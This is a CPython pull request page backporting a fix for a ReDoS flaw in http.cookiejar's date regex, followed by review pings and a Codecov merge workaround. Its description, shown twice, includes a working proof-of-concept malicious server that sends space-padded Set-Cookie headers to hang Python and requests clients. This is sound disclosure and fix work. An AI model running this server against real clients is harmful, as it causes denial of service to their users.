Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[3.5] bpo-38804: Fix REDoS in http.cookiejar (GH-17157) #17344

Merged
merged 1 commit into from Apr 3, 2020

Conversation

Projects
None yet
5 participants
@vstinner
Copy link
Member

@vstinner vstinner commented Nov 22, 2019

The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

\d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

from http.server import BaseHTTPRequestHandler, HTTPServer

def make_set_cookie_value(n_spaces):
    spaces = " " * n_spaces
    expiry = f"1-c-1{spaces}!"
    return f"b;Expires={expiry}"

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.log_request(204)
        self.send_response_only(204)  # Don't bother sending Server and Date
        n_spaces = (
            int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
            if len(self.path) > 1 else
            65506  # Max header line length 65536
        )
        value = make_set_cookie_value(n_spaces)
        for i in range(99):  # Not necessary, but we can have up to 100 header lines
            self.send_header("Set-Cookie", value)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

import http.cookiejar, urllib.request
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

import requests
requests.get("http://localhost:44020/")
  • Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

  • Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.

(cherry picked from commit 1b779bf)

https://bugs.python.org/issue38804

@vstinner
Copy link
Member Author

@vstinner vstinner commented Nov 22, 2019

@serhiy-storchaka: Would you mind to review this straighforward (automated) backport of PR #17157 that you approved?

@vstinner
Copy link
Member Author

@vstinner vstinner commented Nov 24, 2019

@bcaller: Would you mind to review this straighforward (automated) backport of your PR #17157?

@vstinner
Copy link
Member Author

@vstinner vstinner commented Nov 28, 2019

@larryhastings: Would you mind to merge this straighforward backport (no conflict)? It has been approved by the author of the original change.

@vstinner
Copy link
Member Author

@vstinner vstinner commented Dec 19, 2019

1 similar comment
@vstinner
Copy link
Member Author

@vstinner vstinner commented Jan 30, 2020

@vstinner
Copy link
Member Author

@vstinner vstinner commented Mar 25, 2020

Fresh ping @larryhastings: Can you please merge this PR into 3.5?

@larryhastings
Copy link
Contributor

@larryhastings larryhastings commented Mar 28, 2020

It seems I'm not allowed to squash and merge until our iron-fisted new Codecov/patch overlord is satisfied.

@vstinner
Copy link
Member Author

@vstinner vstinner commented Mar 28, 2020

It seems I'm not allowed to squash and merge until our iron-fisted new Codecov/patch overlord is satisfied.

Maybe try to copy .github/codecov.yml from master?

@larryhastings
Copy link
Contributor

@larryhastings larryhastings commented Mar 28, 2020

I don't know anything about it. But, I interpreted the complaint of the robot to mean "the tests you added don't exercise all the code you added".

@vstinner
Copy link
Member Author

@vstinner vstinner commented Apr 2, 2020

It seems I'm not allowed to squash and merge until our iron-fisted new Codecov/patch overlord is satisfied.

If I understood correctly, you cannot merge this security fix because of Codecov. I created https://bugs.python.org/issue40156 and #19309 to disable CodeCov in the 3.5 branch.

The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.

(cherry picked from commit 1b779bf)
@vstinner vstinner force-pushed the cookiejar_regex35 branch from 70597af to dbe31f4 Apr 3, 2020
@vstinner
Copy link
Member Author

@vstinner vstinner commented Apr 3, 2020

PR rebased to get the Codecov CI fix.

@larryhastings larryhastings merged commit 55a6a16 into python:3.5 Apr 3, 2020
4 checks passed
@bedevere-bot
Copy link

@bedevere-bot bedevere-bot commented Apr 3, 2020

@larryhastings: Please replace # with GH- in the commit message next time. Thanks!

@larryhastings
Copy link
Contributor

@larryhastings larryhastings commented Apr 3, 2020

Thanks, Victor!

@vstinner vstinner deleted the cookiejar_regex35 branch Jan 19, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment